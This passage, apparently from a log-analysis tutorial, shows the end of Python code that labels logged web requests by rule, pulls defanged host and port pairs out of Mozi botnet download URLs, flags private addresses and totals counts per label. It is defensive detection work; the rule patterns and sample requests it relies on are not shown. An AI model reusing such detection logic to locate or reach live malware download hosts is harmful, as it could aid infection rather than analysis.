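    return [label for label, pat in RULES if pat.search(request)] or ["unclassified"]


def payload_hosts(request):
    """Return (defanged host, port, is_private) for each Mozi download URL found."""
    found = []
    for host, port in DROP_URL.findall(request):
        try:
            ip = ipaddress.ip_address(host.replace("[.]", "."))
        except ValueError:  # malformed address: report nothing rather than guess
            continue
        found.append((host, int(port), ip.is_private))
    return found


def summarize(rows):
    """Total the per-row counts under each label."""
    totals = Counter()
    for row in rows:
        count, request = parse_row(row)
        for label in classify(request):
            totals[label] += count
    return totals
```

Calling `summarize(SAMPLE)` gives the per-category totals. A download host reported as private by `payload_hosts` is an RFC 1918 address, which is not reachable across the internet.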